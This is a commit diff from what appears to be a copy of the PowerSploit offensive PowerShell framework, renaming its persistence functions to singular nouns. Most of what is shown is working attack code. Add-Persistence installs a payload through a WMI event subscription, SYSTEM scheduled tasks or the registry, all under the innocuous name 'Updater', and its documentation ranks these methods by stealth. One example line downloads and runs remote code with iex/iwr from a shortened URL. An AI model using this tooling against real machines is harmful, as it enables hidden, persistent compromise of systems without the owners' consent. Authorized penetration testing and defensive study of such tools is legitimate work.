Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

#31 Persistence module function nouns are now singular 

The function names New-UserPersistenceOption and
New-ElevatedPersistenceOptionNew-ElevatedPersistenceOption now conform
to PowerShell naming best practices.
This commit is contained in:
mattifestation 2014-02-23 10:31:24 -05:00
parent 28790b5a08
commit bbd382e52a
5 changed files with 42 additions and 42 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

50
Persistence/Add-Persistence.ps1
View File

@ -8,7 +8,7 @@ function Add-Persistence
PowerSploit Function: Add-Persistence PowerSploit Function: Add-Persistence
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: New-ElevatedPersistenceOptions, New-UserPersistenceOptions Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption
Optional Dependencies: None Optional Dependencies: None
.DESCRIPTION .DESCRIPTION
@ -23,15 +23,15 @@ function Add-Persistence
Specifies the path to your payload. Specifies the path to your payload.
.PARAMETER ElevatedPersistenceOptions .PARAMETER ElevatedPersistenceOption
Specifies the trigger for the persistent payload if the target is running elevated. Specifies the trigger for the persistent payload if the target is running elevated.
You must run New-ElevatedPersistenceOptions to generate this argument. You must run New-ElevatedPersistenceOption to generate this argument.
.PARAMETER UserPersistenceOptions .PARAMETER UserPersistenceOption
Specifies the trigger for the persistent payload if the target is not running elevated. Specifies the trigger for the persistent payload if the target is not running elevated.
You must run New-UserPersistenceOptions to generate this argument. You must run New-UserPersistenceOption to generate this argument.
.PARAMETER PersistenceScriptName .PARAMETER PersistenceScriptName
@ -71,9 +71,9 @@ function Add-Persistence
.EXAMPLE .EXAMPLE
C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM' C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
C:\PS>$UserOptions = New-UserPersistenceOptions -Registry -AtLogon C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon
C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose
Description Description
----------- -----------
@ -82,9 +82,9 @@ function Add-Persistence
.EXAMPLE .EXAMPLE
C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) }
C:\PS>$ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
C:\PS>$UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOptions $ElevatedOptions -UserPersistenceOptions $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1
Description Description
----------- -----------
@ -108,10 +108,10 @@ function Add-Persistence
$FilePath, $FilePath,
[Parameter( Mandatory = $True )] [Parameter( Mandatory = $True )]
$ElevatedPersistenceOptions, $ElevatedPersistenceOption,
[Parameter( Mandatory = $True )] [Parameter( Mandatory = $True )]
$UserPersistenceOptions, $UserPersistenceOption,
[ValidateNotNullOrEmpty()] [ValidateNotNullOrEmpty()]
[String] [String]
@ -136,12 +136,12 @@ function Add-Persistence
#region Validate arguments #region Validate arguments
if ($ElevatedPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOptions') if ($ElevatedPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.ElevatedPersistenceOption')
{ {
throw 'You provided invalid elevated persistence options.' throw 'You provided invalid elevated persistence options.'
} }
if ($UserPersistenceOptions.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOptions') if ($UserPersistenceOption.PSObject.TypeNames[0] -ne 'PowerSploit.Persistence.UserPersistenceOption')
{ {
throw 'You provided invalid user-level persistence options.' throw 'You provided invalid user-level persistence options.'
} }
@ -171,9 +171,9 @@ function Add-Persistence
$RemovalScriptFile = "$($Path)\$($Leaf)" $RemovalScriptFile = "$($Path)\$($Leaf)"
} }
if ($PSBoundParameters['Path']) if ($PSBoundParameters['FilePath'])
{ {
Get-ChildItem $Path -ErrorAction Stop | Out-Null Get-ChildItem $FilePath -ErrorAction Stop
$Script = [IO.File]::ReadAllText((Resolve-Path $Path)) $Script = [IO.File]::ReadAllText((Resolve-Path $Path))
} }
else else
@ -216,7 +216,7 @@ function Add-Persistence
#region Process persistence options #region Process persistence options
# Begin processing elevated persistence options # Begin processing elevated persistence options
switch ($ElevatedPersistenceOptions.Method) switch ($ElevatedPersistenceOption.Method)
{ {
'PermanentWMI' 'PermanentWMI'
{ {
@ -226,7 +226,7 @@ Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "nam
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match 'Updater'} | Remove-WmiObject
} }
switch ($ElevatedPersistenceOptions.Trigger) switch ($ElevatedPersistenceOption.Trigger)
{ {
'AtStartup' 'AtStartup'
{ {
@ -235,7 +235,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
'Daily' 'Daily'
{ {
$ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOptions.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOptions.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`"" $ElevatedTrigger = "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage=```"WQL```";Query=```"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = $($ElevatedPersistenceOption.Time.ToString('HH')) AND TargetInstance.Minute = $($ElevatedPersistenceOption.Time.ToString('mm')) GROUP WITHIN 60```"};```$Consumer=Set-WmiInstance -Namespace ```"root\subscription```" -Class 'CommandLineEventConsumer' -Arguments @{ name='Updater';CommandLineTemplate=```"```$(```$Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive```";RunInteractively='false'};Set-WmiInstance -Namespace ```"root\subscription```" -Class __FilterToConsumerBinding -Arguments @{Filter=```$Filter;Consumer=```$Consumer} | Out-Null`""
} }
default default
@ -250,7 +250,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
$CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'
$ElevatedTriggerRemoval = "schtasks /Delete /TN Updater" $ElevatedTriggerRemoval = "schtasks /Delete /TN Updater"
switch ($ElevatedPersistenceOptions.Trigger) switch ($ElevatedPersistenceOption.Trigger)
{ {
'AtLogon' 'AtLogon'
{ {
@ -259,7 +259,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
'Daily' 'Daily'
{ {
$ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR " $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
} }
'OnIdle' 'OnIdle'
@ -291,18 +291,18 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
} }
# Begin processing user-level persistence options # Begin processing user-level persistence options
switch ($UserPersistenceOptions.Method) switch ($UserPersistenceOption.Method)
{ {
'ScheduledTask' 'ScheduledTask'
{ {
$CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"' $CommandLine = '`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'
$UserTriggerRemoval = "schtasks /Delete /TN Updater" $UserTriggerRemoval = "schtasks /Delete /TN Updater"
switch ($UserPersistenceOptions.Trigger) switch ($UserPersistenceOption.Trigger)
{ {
'Daily' 'Daily'
{ {
$UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOptions.Time.ToString('HH:mm:ss')) /TN Updater /TR " $UserTrigger = "schtasks /Create /SC DAILY /ST $($UserPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
} }
'OnIdle' 'OnIdle'

14
Persistence/New-ElevatedPersistenceOptions.ps1 → Persistence/New-ElevatedPersistenceOption.ps1
View File

@ -1,11 +1,11 @@
function New-ElevatedPersistenceOptions function New-ElevatedPersistenceOption
{ {
<# <#
.SYNOPSIS .SYNOPSIS
Configure elevated persistence options for the Add-Persistence function. Configure elevated persistence options for the Add-Persistence function.
PowerSploit Function: New-ElevatedPersistenceOptions PowerSploit Function: New-ElevatedPersistenceOption
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
@ -13,7 +13,7 @@ function New-ElevatedPersistenceOptions
.DESCRIPTION .DESCRIPTION
New-ElevatedPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. New-ElevatedPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry.
.PARAMETER PermanentWMI .PARAMETER PermanentWMI
@ -61,15 +61,15 @@ function New-ElevatedPersistenceOptions
.EXAMPLE .EXAMPLE
C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM' C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
.EXAMPLE .EXAMPLE
C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -Registry -AtStartup C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
.EXAMPLE .EXAMPLE
C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
.LINK .LINK
@ -164,7 +164,7 @@ function New-ElevatedPersistenceOptions
} }
$PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
$PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOptions' $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOption'
Write-Output $PersistenceOptions Write-Output $PersistenceOptions
} }

12
Persistence/New-UserPersistenceOptions.ps1 → Persistence/New-UserPersistenceOption.ps1
View File

@ -1,11 +1,11 @@
function New-UserPersistenceOptions function New-UserPersistenceOption
{ {
<# <#
.SYNOPSIS .SYNOPSIS
Configure user-level persistence options for the Add-Persistence function. Configure user-level persistence options for the Add-Persistence function.
PowerSploit Function: New-UserPersistenceOptions PowerSploit Function: New-UserPersistenceOption
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
@ -13,7 +13,7 @@ function New-UserPersistenceOptions
.DESCRIPTION .DESCRIPTION
New-UserPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry.
.PARAMETER ScheduledTask .PARAMETER ScheduledTask
@ -49,11 +49,11 @@ function New-UserPersistenceOptions
.EXAMPLE .EXAMPLE
C:\PS> $UserOptions = New-UserPersistenceOptions -Registry -AtLogon C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon
.EXAMPLE .EXAMPLE
C:\PS> $UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
.LINK .LINK
@ -122,7 +122,7 @@ function New-UserPersistenceOptions
} }
$PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable
$PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOptions' $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOption'
Write-Output $PersistenceOptions Write-Output $PersistenceOptions
} }

4
Persistence/Persistence.psd1
View File

@ -31,7 +31,7 @@ CmdletsToExport = '*'
ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}) ModuleList = @(@{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'})
# List of all files packaged with this module # List of all files packaged with this module
FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOptions.ps1', FileList = 'Persistence.psm1', 'Persistence.psd1', 'Add-Persistence.ps1', 'New-ElevatedPersistenceOption.ps1',
'New-UserPersistenceOptions.ps1', 'Usage.md' 'New-UserPersistenceOption.ps1', 'Usage.md'
} }

4
README.md
View File

@ -48,11 +48,11 @@ Strips comments and extra whitespace from a script.
**Add persistence capabilities to a PowerShell script** **Add persistence capabilities to a PowerShell script**
#### `New-UserPersistenceOptions` #### `New-UserPersistenceOption`
Configure user-level persistence options for the Add-Persistence function. Configure user-level persistence options for the Add-Persistence function.
#### `New-ElevatedPersistenceOptions` #### `New-ElevatedPersistenceOption`
Configure elevated persistence options for the Add-Persistence function. Configure elevated persistence options for the Add-Persistence function.